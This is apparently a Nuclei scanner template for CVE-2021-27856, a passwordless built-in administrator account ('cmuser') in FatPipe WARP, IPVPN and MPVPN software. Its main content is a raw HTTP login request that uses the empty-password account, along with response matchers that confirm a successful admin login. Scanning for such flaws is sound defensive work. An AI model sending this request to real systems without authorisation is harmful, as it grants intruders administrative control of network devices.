FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
PoC代码[已公开]
id: CVE-2021-27856
info:
name: FatPipe WARP/IPVPN/MPVPN - Backdoor Account
author: gy741
severity: critical
description: |
FatPipe WARP, IPVPN, and MPVPN software prior to versions 10.1.2r60p91 and 10.2.2r42 contain an account named "cmuser" with administrative privileges and no password, letting attackers gain unauthorized admin access, exploit requires no authentication.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
- https://www.fatpipeinc.com/support/advisories.php
- https://www.fatpipeinc.com/support/cve-list.php
- https://www.zeroscience.mk/codes/fatpipe_backdoor.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-27856
cwe-id: NVD-CWE-Other
epss-score: 0.57408
epss-percentile: 0.98037
cpe: cpe:2.3:o:fatpipeinc:warp_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: fatpipeinc
product: warp_firmware
tags: cve,cve2021,fatpipe,default-login,backdoor,auth-bypass,vkev,vuln
http:
- raw:
- |
POST /fpui/loginServlet HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
words:
- '"loginRes":"success"'
- '"activeUserName":"cmuser"'
condition: and
# digest: 4a0a0047304502210093e4764ff60525b8f3404f36153a334ef1c19774688405b44ada2068987bbc47022029e6d07fd2dd984b319382d06d1708cfd62149034781940ff056be8dee785eba:922c64590222798bb761d5b6d8e72950